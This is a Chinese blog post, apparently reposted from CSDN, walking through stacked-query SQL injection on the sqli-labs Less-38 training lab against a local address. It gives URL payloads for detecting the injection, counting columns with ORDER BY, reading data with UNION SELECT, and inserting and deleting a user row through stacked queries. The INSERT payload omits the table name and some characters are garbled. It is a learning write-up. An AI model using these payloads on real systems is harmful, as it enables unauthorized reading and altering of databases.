sql_lab之sqli中的堆叠型注入(less-38)

发布时间:2023年12月23日

堆叠注入(less-38)

1.判断注入类型

http://127.0.0.3/less-38/?id=1' and 1=2 -- s?没有回显

http://127.0.0.3/less-38/?id=1' and 1=1?-- s?有回显

则说明是单字节’注入

2.查询字段数

http://127.0.0.3/less-38/?id=1' order by 4 -- s?报错

http://127.0.0.3/less-38/?id=1' order by 3?-- s?有回显

说明字段数为3

3.判断回显点

http://127.0.0.3/less-38/?id=-1' union select 1,2,3 -- s

4.查询数据库

http://127.0.0.3/less-38/?id=-1' union select 1,database(),3 -- s

接下来的步骤可以用联合查询进行查询

堆叠注入攻击

(1)在users表中添加一个用户

http://127.0.0.3/less-38/?id=1'; insert ?into values(17,'gao','a123456') -- s

证明添加成功

(2)在users表中删除一个用户

http://127.0.0.3/less-38/?id=1';delete from users where users.username='gao' ??-- s

表中没有gao这个用户,说明删除成功

文章来源:https://blog.csdn.net/qq_59020256/article/details/135164934
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。